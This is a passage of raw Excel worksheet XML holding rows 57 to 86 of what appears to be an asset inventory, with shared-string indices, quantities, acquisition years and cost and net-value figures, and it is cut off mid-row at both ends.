      <c r="A57" s="93"/>
      <c r="B57" s="88">
        <v>51</v>
      </c>
      <c r="C57" s="243" t="s">
        <v>4051</v>
      </c>
      <c r="D57" s="256" t="s">
        <v>1324</v>
      </c>
      <c r="E57" s="243" t="s">
        <v>4052</v>
      </c>
      <c r="F57" s="89"/>
      <c r="G57" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H57" s="94">
        <v>1</v>
      </c>
      <c r="I57" s="243" t="s">
        <v>1171</v>
      </c>
      <c r="J57" s="98">
        <v>7470</v>
      </c>
      <c r="K57" s="99">
        <v>2249.6</v>
      </c>
      <c r="L57" s="95"/>
      <c r="M57" s="97"/>
      <c r="N57" s="97"/>
      <c r="O57" s="97"/>
      <c r="P57" s="97"/>
      <c r="Q57" s="97"/>
      <c r="R57" s="97"/>
      <c r="S57" s="97"/>
      <c r="T57" s="97"/>
      <c r="U57" s="97"/>
      <c r="V57" s="97"/>
      <c r="W57" s="97"/>
      <c r="X57" s="97"/>
      <c r="Y57" s="97"/>
      <c r="Z57" s="97"/>
      <c r="AA57" s="97"/>
      <c r="AB57" s="97"/>
      <c r="AC57" s="97"/>
      <c r="AD57" s="97"/>
      <c r="AE57" s="97"/>
      <c r="AF57" s="97"/>
    </row>
    <row r="58" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A58" s="93"/>
      <c r="B58" s="88">
        <v>52</v>
      </c>
      <c r="C58" s="243" t="s">
        <v>4053</v>
      </c>
      <c r="D58" s="256" t="s">
        <v>4054</v>
      </c>
      <c r="E58" s="243" t="s">
        <v>3974</v>
      </c>
      <c r="F58" s="89"/>
      <c r="G58" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H58" s="94">
        <v>1</v>
      </c>
      <c r="I58" s="243" t="s">
        <v>1171</v>
      </c>
      <c r="J58" s="98">
        <v>4590</v>
      </c>
      <c r="K58" s="99">
        <v>1395.36</v>
      </c>
      <c r="L58" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M58" s="97"/>
      <c r="N58" s="97"/>
      <c r="O58" s="97"/>
      <c r="P58" s="97"/>
      <c r="Q58" s="97"/>
      <c r="R58" s="97"/>
      <c r="S58" s="97"/>
      <c r="T58" s="97"/>
      <c r="U58" s="97"/>
      <c r="V58" s="97"/>
      <c r="W58" s="97"/>
      <c r="X58" s="97"/>
      <c r="Y58" s="97"/>
      <c r="Z58" s="97"/>
      <c r="AA58" s="97"/>
      <c r="AB58" s="97"/>
      <c r="AC58" s="97"/>
      <c r="AD58" s="97"/>
      <c r="AE58" s="97"/>
      <c r="AF58" s="97"/>
    </row>
    <row r="59" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A59" s="93"/>
      <c r="B59" s="88">
        <v>53</v>
      </c>
      <c r="C59" s="243" t="s">
        <v>4055</v>
      </c>
      <c r="D59" s="256" t="s">
        <v>4056</v>
      </c>
      <c r="E59" s="243" t="s">
        <v>4057</v>
      </c>
      <c r="F59" s="89"/>
      <c r="G59" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H59" s="94">
        <v>1</v>
      </c>
      <c r="I59" s="243" t="s">
        <v>4058</v>
      </c>
      <c r="J59" s="98">
        <v>130000</v>
      </c>
      <c r="K59" s="99">
        <v>36400</v>
      </c>
      <c r="L59" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M59" s="97"/>
      <c r="N59" s="97"/>
      <c r="O59" s="97"/>
      <c r="P59" s="97"/>
      <c r="Q59" s="97"/>
      <c r="R59" s="97"/>
      <c r="S59" s="97"/>
      <c r="T59" s="97"/>
      <c r="U59" s="97"/>
      <c r="V59" s="97"/>
      <c r="W59" s="97"/>
      <c r="X59" s="97"/>
      <c r="Y59" s="97"/>
      <c r="Z59" s="97"/>
      <c r="AA59" s="97"/>
      <c r="AB59" s="97"/>
      <c r="AC59" s="97"/>
      <c r="AD59" s="97"/>
      <c r="AE59" s="97"/>
      <c r="AF59" s="97"/>
    </row>
    <row r="60" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A60" s="93"/>
      <c r="B60" s="88">
        <v>54</v>
      </c>
      <c r="C60" s="243" t="s">
        <v>4059</v>
      </c>
      <c r="D60" s="256" t="s">
        <v>4060</v>
      </c>
      <c r="E60" s="243" t="s">
        <v>4061</v>
      </c>
      <c r="F60" s="89"/>
      <c r="G60" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H60" s="94">
        <v>1</v>
      </c>
      <c r="I60" s="243" t="s">
        <v>637</v>
      </c>
      <c r="J60" s="98">
        <v>325000</v>
      </c>
      <c r="K60" s="99">
        <v>91000</v>
      </c>
      <c r="L60" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M60" s="97"/>
      <c r="N60" s="97"/>
      <c r="O60" s="97"/>
      <c r="P60" s="97"/>
      <c r="Q60" s="97"/>
      <c r="R60" s="97"/>
      <c r="S60" s="97"/>
      <c r="T60" s="97"/>
      <c r="U60" s="97"/>
      <c r="V60" s="97"/>
      <c r="W60" s="97"/>
      <c r="X60" s="97"/>
      <c r="Y60" s="97"/>
      <c r="Z60" s="97"/>
      <c r="AA60" s="97"/>
      <c r="AB60" s="97"/>
      <c r="AC60" s="97"/>
      <c r="AD60" s="97"/>
      <c r="AE60" s="97"/>
      <c r="AF60" s="97"/>
    </row>
    <row r="61" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A61" s="93"/>
      <c r="B61" s="88">
        <v>55</v>
      </c>
      <c r="C61" s="243" t="s">
        <v>4062</v>
      </c>
      <c r="D61" s="256" t="s">
        <v>4063</v>
      </c>
      <c r="E61" s="243" t="s">
        <v>4064</v>
      </c>
      <c r="F61" s="89"/>
      <c r="G61" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H61" s="94">
        <v>1</v>
      </c>
      <c r="I61" s="243" t="s">
        <v>1309</v>
      </c>
      <c r="J61" s="98">
        <v>132000</v>
      </c>
      <c r="K61" s="99">
        <v>36960</v>
      </c>
      <c r="L61" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M61" s="97"/>
      <c r="N61" s="97"/>
      <c r="O61" s="97"/>
      <c r="P61" s="97"/>
      <c r="Q61" s="97"/>
      <c r="R61" s="97"/>
      <c r="S61" s="97"/>
      <c r="T61" s="97"/>
      <c r="U61" s="97"/>
      <c r="V61" s="97"/>
      <c r="W61" s="97"/>
      <c r="X61" s="97"/>
      <c r="Y61" s="97"/>
      <c r="Z61" s="97"/>
      <c r="AA61" s="97"/>
      <c r="AB61" s="97"/>
      <c r="AC61" s="97"/>
      <c r="AD61" s="97"/>
      <c r="AE61" s="97"/>
      <c r="AF61" s="97"/>
    </row>
    <row r="62" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A62" s="93"/>
      <c r="B62" s="88">
        <v>56</v>
      </c>
      <c r="C62" s="243" t="s">
        <v>4065</v>
      </c>
      <c r="D62" s="256" t="s">
        <v>4066</v>
      </c>
      <c r="E62" s="243" t="s">
        <v>4067</v>
      </c>
      <c r="F62" s="89"/>
      <c r="G62" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H62" s="94">
        <v>1</v>
      </c>
      <c r="I62" s="243" t="s">
        <v>1309</v>
      </c>
      <c r="J62" s="98">
        <v>33000</v>
      </c>
      <c r="K62" s="99">
        <v>9240</v>
      </c>
      <c r="L62" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M62" s="97"/>
      <c r="N62" s="97"/>
      <c r="O62" s="97"/>
      <c r="P62" s="97"/>
      <c r="Q62" s="97"/>
      <c r="R62" s="97"/>
      <c r="S62" s="97"/>
      <c r="T62" s="97"/>
      <c r="U62" s="97"/>
      <c r="V62" s="97"/>
      <c r="W62" s="97"/>
      <c r="X62" s="97"/>
      <c r="Y62" s="97"/>
      <c r="Z62" s="97"/>
      <c r="AA62" s="97"/>
      <c r="AB62" s="97"/>
      <c r="AC62" s="97"/>
      <c r="AD62" s="97"/>
      <c r="AE62" s="97"/>
      <c r="AF62" s="97"/>
    </row>
    <row r="63" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A63" s="93"/>
      <c r="B63" s="88">
        <v>57</v>
      </c>
      <c r="C63" s="243" t="s">
        <v>4068</v>
      </c>
      <c r="D63" s="256" t="s">
        <v>4069</v>
      </c>
      <c r="E63" s="243" t="s">
        <v>4070</v>
      </c>
      <c r="F63" s="89"/>
      <c r="G63" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H63" s="94">
        <v>1</v>
      </c>
      <c r="I63" s="243" t="s">
        <v>1309</v>
      </c>
      <c r="J63" s="98">
        <v>180000</v>
      </c>
      <c r="K63" s="99">
        <v>50400</v>
      </c>
      <c r="L63" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M63" s="97"/>
      <c r="N63" s="97"/>
      <c r="O63" s="97"/>
      <c r="P63" s="97"/>
      <c r="Q63" s="97"/>
      <c r="R63" s="97"/>
      <c r="S63" s="97"/>
      <c r="T63" s="97"/>
      <c r="U63" s="97"/>
      <c r="V63" s="97"/>
      <c r="W63" s="97"/>
      <c r="X63" s="97"/>
      <c r="Y63" s="97"/>
      <c r="Z63" s="97"/>
      <c r="AA63" s="97"/>
      <c r="AB63" s="97"/>
      <c r="AC63" s="97"/>
      <c r="AD63" s="97"/>
      <c r="AE63" s="97"/>
      <c r="AF63" s="97"/>
    </row>
    <row r="64" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A64" s="93"/>
      <c r="B64" s="88">
        <v>58</v>
      </c>
      <c r="C64" s="243" t="s">
        <v>4071</v>
      </c>
      <c r="D64" s="256" t="s">
        <v>1273</v>
      </c>
      <c r="E64" s="243" t="s">
        <v>4072</v>
      </c>
      <c r="F64" s="89"/>
      <c r="G64" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H64" s="94">
        <v>1</v>
      </c>
      <c r="I64" s="243" t="s">
        <v>3363</v>
      </c>
      <c r="J64" s="98">
        <v>17000</v>
      </c>
      <c r="K64" s="99">
        <v>5712</v>
      </c>
      <c r="L64" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M64" s="97"/>
      <c r="N64" s="97"/>
      <c r="O64" s="97"/>
      <c r="P64" s="97"/>
      <c r="Q64" s="97"/>
      <c r="R64" s="97"/>
      <c r="S64" s="97"/>
      <c r="T64" s="97"/>
      <c r="U64" s="97"/>
      <c r="V64" s="97"/>
      <c r="W64" s="97"/>
      <c r="X64" s="97"/>
      <c r="Y64" s="97"/>
      <c r="Z64" s="97"/>
      <c r="AA64" s="97"/>
      <c r="AB64" s="97"/>
      <c r="AC64" s="97"/>
      <c r="AD64" s="97"/>
      <c r="AE64" s="97"/>
      <c r="AF64" s="97"/>
    </row>
    <row r="65" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A65" s="93"/>
      <c r="B65" s="88">
        <v>59</v>
      </c>
      <c r="C65" s="243" t="s">
        <v>4073</v>
      </c>
      <c r="D65" s="256" t="s">
        <v>4074</v>
      </c>
      <c r="E65" s="243" t="s">
        <v>4075</v>
      </c>
      <c r="F65" s="89"/>
      <c r="G65" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H65" s="94">
        <v>1</v>
      </c>
      <c r="I65" s="243" t="s">
        <v>1544</v>
      </c>
      <c r="J65" s="98">
        <v>255000</v>
      </c>
      <c r="K65" s="99">
        <v>71400</v>
      </c>
      <c r="L65" s="256" t="s">
        <v>3935</v>
      </c>
      <c r="M65" s="97"/>
      <c r="N65" s="97"/>
      <c r="O65" s="97"/>
      <c r="P65" s="97"/>
      <c r="Q65" s="97"/>
      <c r="R65" s="97"/>
      <c r="S65" s="97"/>
      <c r="T65" s="97"/>
      <c r="U65" s="97"/>
      <c r="V65" s="97"/>
      <c r="W65" s="97"/>
      <c r="X65" s="97"/>
      <c r="Y65" s="97"/>
      <c r="Z65" s="97"/>
      <c r="AA65" s="97"/>
      <c r="AB65" s="97"/>
      <c r="AC65" s="97"/>
      <c r="AD65" s="97"/>
      <c r="AE65" s="97"/>
      <c r="AF65" s="97"/>
    </row>
    <row r="66" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A66" s="93"/>
      <c r="B66" s="88">
        <v>60</v>
      </c>
      <c r="C66" s="243" t="s">
        <v>4076</v>
      </c>
      <c r="D66" s="256" t="s">
        <v>4077</v>
      </c>
      <c r="E66" s="243" t="s">
        <v>4078</v>
      </c>
      <c r="F66" s="89"/>
      <c r="G66" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H66" s="94">
        <v>1</v>
      </c>
      <c r="I66" s="243" t="s">
        <v>4079</v>
      </c>
      <c r="J66" s="98">
        <v>98290.6</v>
      </c>
      <c r="K66" s="99">
        <v>43993.6</v>
      </c>
      <c r="L66" s="256" t="s">
        <v>2159</v>
      </c>
      <c r="M66" s="97"/>
      <c r="N66" s="97"/>
      <c r="O66" s="97"/>
      <c r="P66" s="97"/>
      <c r="Q66" s="97"/>
      <c r="R66" s="97"/>
      <c r="S66" s="97"/>
      <c r="T66" s="97"/>
      <c r="U66" s="97"/>
      <c r="V66" s="97"/>
      <c r="W66" s="97"/>
      <c r="X66" s="97"/>
      <c r="Y66" s="97"/>
      <c r="Z66" s="97"/>
      <c r="AA66" s="97"/>
      <c r="AB66" s="97"/>
      <c r="AC66" s="97"/>
      <c r="AD66" s="97"/>
      <c r="AE66" s="97"/>
      <c r="AF66" s="97"/>
    </row>
    <row r="67" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A67" s="93"/>
      <c r="B67" s="88">
        <v>61</v>
      </c>
      <c r="C67" s="243" t="s">
        <v>4080</v>
      </c>
      <c r="D67" s="256" t="s">
        <v>3415</v>
      </c>
      <c r="E67" s="243" t="s">
        <v>4081</v>
      </c>
      <c r="F67" s="89"/>
      <c r="G67" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H67" s="94">
        <v>1</v>
      </c>
      <c r="I67" s="243" t="s">
        <v>3582</v>
      </c>
      <c r="J67" s="98">
        <v>538461.54</v>
      </c>
      <c r="K67" s="99">
        <v>198131.2</v>
      </c>
      <c r="L67" s="256" t="s">
        <v>4082</v>
      </c>
      <c r="M67" s="97"/>
      <c r="N67" s="97"/>
      <c r="O67" s="97"/>
      <c r="P67" s="97"/>
      <c r="Q67" s="97"/>
      <c r="R67" s="97"/>
      <c r="S67" s="97"/>
      <c r="T67" s="97"/>
      <c r="U67" s="97"/>
      <c r="V67" s="97"/>
      <c r="W67" s="97"/>
      <c r="X67" s="97"/>
      <c r="Y67" s="97"/>
      <c r="Z67" s="97"/>
      <c r="AA67" s="97"/>
      <c r="AB67" s="97"/>
      <c r="AC67" s="97"/>
      <c r="AD67" s="97"/>
      <c r="AE67" s="97"/>
      <c r="AF67" s="97"/>
    </row>
    <row r="68" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A68" s="93"/>
      <c r="B68" s="88">
        <v>62</v>
      </c>
      <c r="C68" s="243" t="s">
        <v>4083</v>
      </c>
      <c r="D68" s="256" t="s">
        <v>4084</v>
      </c>
      <c r="E68" s="243" t="s">
        <v>4085</v>
      </c>
      <c r="F68" s="89"/>
      <c r="G68" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H68" s="94">
        <v>1</v>
      </c>
      <c r="I68" s="243" t="s">
        <v>1195</v>
      </c>
      <c r="J68" s="98">
        <v>15811.97</v>
      </c>
      <c r="K68" s="99">
        <v>6572.8</v>
      </c>
      <c r="L68" s="256" t="s">
        <v>4086</v>
      </c>
      <c r="M68" s="97"/>
      <c r="N68" s="97"/>
      <c r="O68" s="97"/>
      <c r="P68" s="97"/>
      <c r="Q68" s="97"/>
      <c r="R68" s="97"/>
      <c r="S68" s="97"/>
      <c r="T68" s="97"/>
      <c r="U68" s="97"/>
      <c r="V68" s="97"/>
      <c r="W68" s="97"/>
      <c r="X68" s="97"/>
      <c r="Y68" s="97"/>
      <c r="Z68" s="97"/>
      <c r="AA68" s="97"/>
      <c r="AB68" s="97"/>
      <c r="AC68" s="97"/>
      <c r="AD68" s="97"/>
      <c r="AE68" s="97"/>
      <c r="AF68" s="97"/>
    </row>
    <row r="69" s="88" customFormat="1" customHeight="1" spans="1:15">
      <c r="A69" s="93"/>
      <c r="B69" s="88">
        <v>63</v>
      </c>
      <c r="C69" s="11"/>
      <c r="D69" s="16" t="s">
        <v>2905</v>
      </c>
      <c r="E69" s="16" t="s">
        <v>4087</v>
      </c>
      <c r="F69" s="16"/>
      <c r="G69" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H69" s="16">
        <v>1</v>
      </c>
      <c r="I69" s="88">
        <v>2002</v>
      </c>
      <c r="J69" s="111"/>
      <c r="K69" s="99">
        <v>32000</v>
      </c>
      <c r="M69" s="97"/>
      <c r="N69" s="97"/>
      <c r="O69" s="112"/>
    </row>
    <row r="70" s="88" customFormat="1" customHeight="1" spans="1:15">
      <c r="A70" s="93"/>
      <c r="B70" s="88">
        <v>64</v>
      </c>
      <c r="C70" s="11"/>
      <c r="D70" s="16" t="s">
        <v>4088</v>
      </c>
      <c r="E70" s="16" t="s">
        <v>4089</v>
      </c>
      <c r="F70" s="16"/>
      <c r="G70" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H70" s="16">
        <v>1</v>
      </c>
      <c r="I70" s="88">
        <v>2002</v>
      </c>
      <c r="J70" s="16"/>
      <c r="K70" s="99">
        <v>22400</v>
      </c>
      <c r="M70" s="97"/>
      <c r="N70" s="97"/>
      <c r="O70" s="112"/>
    </row>
    <row r="71" s="88" customFormat="1" customHeight="1" spans="1:15">
      <c r="A71" s="93"/>
      <c r="B71" s="88">
        <v>65</v>
      </c>
      <c r="C71" s="11"/>
      <c r="D71" s="16" t="s">
        <v>2798</v>
      </c>
      <c r="E71" s="16" t="s">
        <v>4090</v>
      </c>
      <c r="F71" s="16"/>
      <c r="G71" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H71" s="16">
        <v>2</v>
      </c>
      <c r="I71" s="88">
        <v>2002</v>
      </c>
      <c r="J71" s="16"/>
      <c r="K71" s="99">
        <v>6400</v>
      </c>
      <c r="M71" s="97"/>
      <c r="N71" s="97"/>
      <c r="O71" s="112"/>
    </row>
    <row r="72" s="88" customFormat="1" customHeight="1" spans="1:15">
      <c r="A72" s="93"/>
      <c r="B72" s="88">
        <v>66</v>
      </c>
      <c r="C72" s="11"/>
      <c r="D72" s="16" t="s">
        <v>2798</v>
      </c>
      <c r="E72" s="16" t="s">
        <v>4091</v>
      </c>
      <c r="F72" s="16"/>
      <c r="G72" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H72" s="16">
        <v>1</v>
      </c>
      <c r="I72" s="88">
        <v>2002</v>
      </c>
      <c r="J72" s="16"/>
      <c r="K72" s="99">
        <v>3200</v>
      </c>
      <c r="M72" s="97"/>
      <c r="N72" s="97"/>
      <c r="O72" s="112"/>
    </row>
    <row r="73" customHeight="1" spans="1:15">
      <c r="A73" s="93"/>
      <c r="B73" s="88">
        <v>67</v>
      </c>
      <c r="C73" s="11"/>
      <c r="D73" s="16" t="s">
        <v>4092</v>
      </c>
      <c r="E73" s="16" t="s">
        <v>4093</v>
      </c>
      <c r="F73" s="16"/>
      <c r="G73" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H73" s="16">
        <v>1</v>
      </c>
      <c r="I73" s="88">
        <v>2002</v>
      </c>
      <c r="K73" s="99">
        <v>200</v>
      </c>
      <c r="L73" s="88"/>
      <c r="M73" s="93"/>
      <c r="N73" s="93"/>
      <c r="O73" s="92"/>
    </row>
    <row r="74" customHeight="1" spans="1:15">
      <c r="A74" s="93"/>
      <c r="B74" s="88">
        <v>68</v>
      </c>
      <c r="C74" s="11"/>
      <c r="D74" s="16" t="s">
        <v>4094</v>
      </c>
      <c r="E74" s="16" t="s">
        <v>4095</v>
      </c>
      <c r="F74" s="16" t="s">
        <v>1266</v>
      </c>
      <c r="G74" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H74" s="16">
        <v>1</v>
      </c>
      <c r="I74" s="88">
        <v>2014</v>
      </c>
      <c r="K74" s="99">
        <v>4480</v>
      </c>
      <c r="L74" s="16"/>
      <c r="M74" s="93"/>
      <c r="N74" s="93"/>
      <c r="O74" s="92"/>
    </row>
    <row r="75" customHeight="1" spans="1:15">
      <c r="A75" s="93"/>
      <c r="B75" s="88">
        <v>69</v>
      </c>
      <c r="C75" s="11"/>
      <c r="D75" s="16" t="s">
        <v>3708</v>
      </c>
      <c r="E75" s="16" t="s">
        <v>4096</v>
      </c>
      <c r="F75" s="16"/>
      <c r="G75" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H75" s="16">
        <v>2</v>
      </c>
      <c r="I75" s="88">
        <v>2014</v>
      </c>
      <c r="K75" s="99">
        <v>7200</v>
      </c>
      <c r="L75" s="16"/>
      <c r="M75" s="93"/>
      <c r="N75" s="93"/>
      <c r="O75" s="92"/>
    </row>
    <row r="76" customHeight="1" spans="1:15">
      <c r="A76" s="93"/>
      <c r="B76" s="88">
        <v>70</v>
      </c>
      <c r="C76" s="11"/>
      <c r="D76" s="16" t="s">
        <v>1324</v>
      </c>
      <c r="E76" s="16" t="s">
        <v>3962</v>
      </c>
      <c r="F76" s="16"/>
      <c r="G76" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H76" s="16">
        <v>2</v>
      </c>
      <c r="I76" s="88">
        <v>2014</v>
      </c>
      <c r="K76" s="99">
        <v>2320</v>
      </c>
      <c r="L76" s="16"/>
      <c r="M76" s="93"/>
      <c r="N76" s="93"/>
      <c r="O76" s="92"/>
    </row>
    <row r="77" customHeight="1" spans="1:15">
      <c r="A77" s="93"/>
      <c r="B77" s="88">
        <v>71</v>
      </c>
      <c r="C77" s="11"/>
      <c r="D77" s="16" t="s">
        <v>4097</v>
      </c>
      <c r="E77" s="16" t="s">
        <v>4093</v>
      </c>
      <c r="F77" s="16" t="s">
        <v>4098</v>
      </c>
      <c r="G77" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H77" s="16">
        <v>1</v>
      </c>
      <c r="I77" s="88">
        <v>2014</v>
      </c>
      <c r="K77" s="99">
        <v>72000</v>
      </c>
      <c r="L77" s="16"/>
      <c r="M77" s="93"/>
      <c r="N77" s="93"/>
      <c r="O77" s="92"/>
    </row>
    <row r="78" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A78" s="93"/>
      <c r="B78" s="88">
        <v>72</v>
      </c>
      <c r="C78" s="11"/>
      <c r="D78" s="96" t="s">
        <v>3952</v>
      </c>
      <c r="E78" s="96" t="s">
        <v>4099</v>
      </c>
      <c r="F78" s="89"/>
      <c r="G78" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H78" s="88">
        <v>1</v>
      </c>
      <c r="I78" s="88">
        <v>2002</v>
      </c>
      <c r="J78" s="113"/>
      <c r="K78" s="99">
        <v>4800</v>
      </c>
      <c r="L78" s="16"/>
      <c r="M78" s="97"/>
      <c r="N78" s="97"/>
      <c r="O78" s="97"/>
      <c r="P78" s="97"/>
      <c r="Q78" s="97"/>
      <c r="R78" s="97"/>
      <c r="S78" s="97"/>
      <c r="T78" s="97"/>
      <c r="U78" s="97"/>
      <c r="V78" s="97"/>
      <c r="W78" s="97"/>
      <c r="X78" s="97"/>
      <c r="Y78" s="97"/>
      <c r="Z78" s="97"/>
      <c r="AA78" s="97"/>
      <c r="AB78" s="97"/>
      <c r="AC78" s="97"/>
      <c r="AD78" s="97"/>
      <c r="AE78" s="97"/>
      <c r="AF78" s="97"/>
    </row>
    <row r="79" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A79" s="93"/>
      <c r="B79" s="88">
        <v>73</v>
      </c>
      <c r="C79" s="11"/>
      <c r="D79" s="16" t="s">
        <v>4100</v>
      </c>
      <c r="E79" s="16" t="s">
        <v>3974</v>
      </c>
      <c r="F79" s="16"/>
      <c r="G79" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H79" s="16">
        <v>1</v>
      </c>
      <c r="I79" s="88">
        <v>2007</v>
      </c>
      <c r="J79" s="111"/>
      <c r="K79" s="99">
        <v>112</v>
      </c>
      <c r="M79" s="97"/>
      <c r="N79" s="97"/>
      <c r="O79" s="97"/>
      <c r="P79" s="97"/>
      <c r="Q79" s="97"/>
      <c r="R79" s="97"/>
      <c r="S79" s="97"/>
      <c r="T79" s="97"/>
      <c r="U79" s="97"/>
      <c r="V79" s="97"/>
      <c r="W79" s="97"/>
      <c r="X79" s="97"/>
      <c r="Y79" s="97"/>
      <c r="Z79" s="97"/>
      <c r="AA79" s="97"/>
      <c r="AB79" s="97"/>
      <c r="AC79" s="97"/>
      <c r="AD79" s="97"/>
      <c r="AE79" s="97"/>
      <c r="AF79" s="97"/>
    </row>
    <row r="80" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A80" s="93"/>
      <c r="B80" s="88">
        <v>74</v>
      </c>
      <c r="C80" s="11"/>
      <c r="D80" s="16" t="s">
        <v>4101</v>
      </c>
      <c r="E80" s="16" t="s">
        <v>4102</v>
      </c>
      <c r="F80" s="16" t="s">
        <v>1266</v>
      </c>
      <c r="G80" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H80" s="16">
        <v>1</v>
      </c>
      <c r="I80" s="88">
        <v>2003</v>
      </c>
      <c r="J80" s="111"/>
      <c r="K80" s="99">
        <v>200</v>
      </c>
      <c r="M80" s="97"/>
      <c r="N80" s="97"/>
      <c r="O80" s="97"/>
      <c r="P80" s="97"/>
      <c r="Q80" s="97"/>
      <c r="R80" s="97"/>
      <c r="S80" s="97"/>
      <c r="T80" s="97"/>
      <c r="U80" s="97"/>
      <c r="V80" s="97"/>
      <c r="W80" s="97"/>
      <c r="X80" s="97"/>
      <c r="Y80" s="97"/>
      <c r="Z80" s="97"/>
      <c r="AA80" s="97"/>
      <c r="AB80" s="97"/>
      <c r="AC80" s="97"/>
      <c r="AD80" s="97"/>
      <c r="AE80" s="97"/>
      <c r="AF80" s="97"/>
    </row>
    <row r="81" s="88" customFormat="1" customHeight="1" spans="1:15">
      <c r="A81" s="93"/>
      <c r="B81" s="88">
        <v>75</v>
      </c>
      <c r="C81" s="11"/>
      <c r="D81" s="88" t="s">
        <v>4103</v>
      </c>
      <c r="E81" s="88" t="s">
        <v>4104</v>
      </c>
      <c r="F81" s="16" t="s">
        <v>1266</v>
      </c>
      <c r="G81" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H81" s="16">
        <v>1</v>
      </c>
      <c r="I81" s="88">
        <v>2003</v>
      </c>
      <c r="J81" s="111"/>
      <c r="K81" s="99">
        <v>320</v>
      </c>
      <c r="M81" s="97"/>
      <c r="N81" s="97"/>
      <c r="O81" s="112"/>
    </row>
    <row r="82" s="88" customFormat="1" customHeight="1" spans="1:15">
      <c r="A82" s="93"/>
      <c r="B82" s="88">
        <v>76</v>
      </c>
      <c r="C82" s="11"/>
      <c r="D82" s="16" t="s">
        <v>4105</v>
      </c>
      <c r="E82" s="16"/>
      <c r="F82" s="16"/>
      <c r="G82" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H82" s="16">
        <v>1</v>
      </c>
      <c r="I82" s="88">
        <v>2003</v>
      </c>
      <c r="J82" s="16"/>
      <c r="K82" s="99">
        <v>1040</v>
      </c>
      <c r="M82" s="97"/>
      <c r="N82" s="97"/>
      <c r="O82" s="112"/>
    </row>
    <row r="83" s="88" customFormat="1" customHeight="1" spans="1:15">
      <c r="A83" s="93"/>
      <c r="B83" s="88">
        <v>77</v>
      </c>
      <c r="C83" s="11"/>
      <c r="D83" s="16" t="s">
        <v>1211</v>
      </c>
      <c r="E83" s="16" t="s">
        <v>4106</v>
      </c>
      <c r="F83" s="16"/>
      <c r="G83" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H83" s="16">
        <v>1</v>
      </c>
      <c r="J83" s="16"/>
      <c r="K83" s="99">
        <v>200</v>
      </c>
      <c r="M83" s="97"/>
      <c r="N83" s="97"/>
      <c r="O83" s="112"/>
    </row>
    <row r="84" s="88" customFormat="1" customHeight="1" spans="1:15">
      <c r="A84" s="93"/>
      <c r="B84" s="88">
        <v>78</v>
      </c>
      <c r="C84" s="11"/>
      <c r="D84" s="16" t="s">
        <v>4107</v>
      </c>
      <c r="E84" s="16" t="s">
        <v>3877</v>
      </c>
      <c r="F84" s="16"/>
      <c r="G84" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H84" s="16">
        <v>2</v>
      </c>
      <c r="J84" s="16"/>
      <c r="K84" s="99">
        <v>200</v>
      </c>
      <c r="M84" s="97"/>
      <c r="N84" s="97"/>
      <c r="O84" s="112"/>
    </row>
    <row r="85" customHeight="1" spans="1:15">
      <c r="A85" s="93"/>
      <c r="B85" s="88">
        <v>79</v>
      </c>
      <c r="C85" s="11"/>
      <c r="D85" s="16" t="s">
        <v>4108</v>
      </c>
      <c r="E85" s="16" t="s">
        <v>4109</v>
      </c>
      <c r="F85" s="16" t="s">
        <v>1263</v>
      </c>
      <c r="G85" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H85" s="16">
        <v>1</v>
      </c>
      <c r="I85" s="88">
        <v>2002</v>
      </c>
      <c r="K85" s="99">
        <v>120</v>
      </c>
      <c r="L85" s="88"/>
      <c r="M85" s="93"/>
      <c r="N85" s="93"/>
      <c r="O85" s="92"/>
    </row>
    <row r="86" customHeight="1" spans="1:15">
      <c r="A86" s="93"/>
      <c r="B86" s="88">
        <v>80</v>
      </c>
      <c r="C86" s="11"/>
      <c r="D86" s="16" t="s">
        <v>4110</v>
      </c>
      <c r="E86" s="16" t="s">
        <v>4111</v>
      </c>
      <c r="F86" s="16"/>
      <c r="G86" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H86" s="16">
        <v>2</v>
      </c>
      <c r="I86" s="88">
